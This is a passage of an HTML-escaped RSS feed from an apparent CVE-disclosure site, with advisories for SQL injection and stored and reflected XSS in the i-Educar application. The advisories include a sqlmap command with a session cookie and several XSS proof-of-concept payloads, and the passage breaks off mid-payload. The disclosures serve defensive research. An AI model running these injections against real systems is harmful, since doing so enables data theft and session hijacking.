&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sqlmap -u &amp;amp;#34;http://localhost:8086/module/ComponenteCurricular/edit?id=8&amp;amp;#34; --cookie=&amp;amp;#34;i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE&amp;amp;#34; --batch --dbs --dbms=postgresql
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10846/image.png&amp;#34;
	width=&amp;#34;568&amp;#34;
	height=&amp;#34;139&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10846/image_hu_46dff48085ff5914.png 480w, /p/cve-2025-10846/image_hu_3f5d69f095c33d40.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;408&amp;#34;
		data-flex-basis=&amp;#34;980px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10846/image-1.png&amp;#34;
	width=&amp;#34;566&amp;#34;
	height=&amp;#34;198&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10846/image-1_hu_fc558fb6fc4f6397.png 480w, /p/cve-2025-10846/image-1_hu_38cb0cffda3c380e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;285&amp;#34;
		data-flex-basis=&amp;#34;686px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10846.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10846.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 23 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10584</title>
        <link>https://www.cvehunters.com/p/cve-2025-10584/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10584/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10584-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_calendario_anotacao_cadphp&amp;#34;&amp;gt;CVE-2025-10584: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;educar_calendario_anotacao_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10584&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10584&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_calendario_anotacao_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_anotacao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_calendario_anotacao_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10584-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_calendario_anotacao_cadphp&amp;#34;&amp;gt;CVE-2025-10584: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;educar_calendario_anotacao_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10584&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10584&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_calendario_anotacao_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_anotacao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_calendario_anotacao_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;nm_anotacao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nm_anotacao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10584/image.png&amp;#34;
	width=&amp;#34;506&amp;#34;
	height=&amp;#34;188&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10584/image_hu_2771ca3675e8bb86.png 480w, /p/cve-2025-10584/image_hu_1ae1524d207e0696.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;269&amp;#34;
		data-flex-basis=&amp;#34;645px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10584/image-1.png&amp;#34;
	width=&amp;#34;513&amp;#34;
	height=&amp;#34;192&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10584/image-1_hu_9c4497507da3b07c.png 480w, /p/cve-2025-10584/image-1_hu_4de765f0b51183da.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;267&amp;#34;
		data-flex-basis=&amp;#34;641px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10584.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10584.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 17 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10590</title>
        <link>https://www.cvehunters.com/p/cve-2025-10590/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10590/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10590-cross-site-scripting-xss-reflected-in-endpoint-educar_usuario_detphp-parameter-ref_pessoa&amp;#34;&amp;gt;CVE-2025-10590: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;educar_usuario_det.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;ref_pessoa&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10590&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10590&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_usuario_det.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;ref_pessoa&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_usuario_det.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;ref_pessoa&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#39;;alert(String.fromCharCode(88,83,83))//&amp;amp;#39;;alert(String.fromCharCode(88,83,83))//&amp;amp;#34;;alert(String.fromCharCode(88,No known CVE&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;SCRIPT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;amp;#39;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;SCRIPT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;String&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;fromCharCode&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;88&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;83&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;83&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;))&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;SCRIPT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10590/image.png&amp;#34;
	width=&amp;#34;1021&amp;#34;
	height=&amp;#34;565&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10590/image_hu_f7f8725a4c3c24c2.png 480w, /p/cve-2025-10590/image_hu_2dd04bd1070639af.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;180&amp;#34;
		data-flex-basis=&amp;#34;433px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10590-cross-site-scripting-xss-reflected-in-endpoint-educar_usuario_detphp-parameter-ref_pessoa&amp;#34;&amp;gt;CVE-2025-10590: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;educar_usuario_det.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;ref_pessoa&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10590&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10590&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_usuario_det.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;ref_pessoa&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_usuario_det.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;ref_pessoa&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#39;;alert(String.fromCharCode(88,83,83))//&amp;amp;#39;;alert(String.fromCharCode(88,83,83))//&amp;amp;#34;;alert(String.fromCharCode(88,No known CVE&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;SCRIPT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;amp;#39;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span 